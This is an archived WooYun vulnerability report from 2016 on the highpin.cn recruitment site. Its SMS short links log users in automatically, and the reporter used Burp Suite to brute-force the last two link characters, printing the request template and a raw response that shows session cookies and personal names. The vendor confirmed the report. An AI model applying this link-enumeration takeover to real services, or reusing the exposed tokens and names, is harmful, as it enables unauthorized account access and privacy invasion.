乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-16: 细节已通知厂商并且等待厂商处理中 2016-05-16: 厂商已经确认,细节仅向厂商公开 2016-05-26: 细节向核心白帽子及相关领域专家公开 2016-06-05: 细节向普通白帽子公开 2016-06-15: 细节向实习白帽子公开 2016-06-30: 细节向公众公开
智联卓聘设计缺陷导致一个链接登录你的账号任意操作
故事从一条短信开始
--------------------------------------【智联卓聘】您好蔡广娜,我是卓聘猎头顾问,给您提供了美术的职位机会,点击t.highpin.cn/m/c3Wec 回T退订
直接访问t.highpin.cn/m/c3Wec,就自动登录该账号
burpsuite尝试爆破后两位,3844条数据,获得有效数据101条(length大于1000的都是响应体带session的)
GET /m/c3W§e1§ HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/6.0)Host: t.highpin.cn
HTTP/1.1 302 FoundServer: TengineDate: Mon, 16 May 2016 06:34:09 GMTContent-Type: text/html; charset=utf-8Content-Length: 306Connection: closeCache-Control: privateLocation: http://m.highpin.cn/Job/SearchList?KeyScope=1&Key=&JobLocation=&Industry=&JobType=&fromtype=767&type=1&l=t&code=5C2C4C755A694C79056D1479446C5C7549345D2C4B758Set-Cookie: SeekerInfo=UserName=566D02360367543707355F6D063600675D370635556D7&UserID=5E6D0F3603675F370235516D7&CID=C0E4F42495631542778490438&NameCN=%e5%bc%a0%e8%b6%85; domain=highpin.cn; path=/Set-Cookie: UserStatus=UserStatus=556D073604675B371B35576D023618675C370035476D0636016757370535536D0D36056754377; domain=highpin.cn; path=/Set-Cookie: SeekerChatAuth=token=0E4F42495631542778490438295F66637D377228014F4A49553157277A49; domain=highpin.cn; path=/Set-Cookie: SeekerMSiteChatAuth=token=0E4F42495631542778490438295F66637D377228014F4A49553157277A49; domain=highpin.cn; path=/Set-Cookie: route=72c625c1ad8094466eb6767d84faf89f;Path=/Set-Cookie: NSC_ijhiqjo-172.19.0.190=ffffffffaf1b1cd845525d5f4f58455e445a4a423660;expires=Mon, 16-May-2016 06:40:15 GMT;path=/;httponly<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://m.highpin.cn/Job/SearchList?KeyScope=1&Key=&JobLocation=&Industry=&JobType=&fromtype=767&type=1&l=t&code=5C2C4C755A694C79056D1479446C5C7549345D2C4B758">here</a>.</h2></body></html>
rt
危害等级:高
漏洞Rank:10
确认时间:2016-05-16 19:26
感谢你对智联招聘安全的关注,问题已经转交对应团队处理。
暂无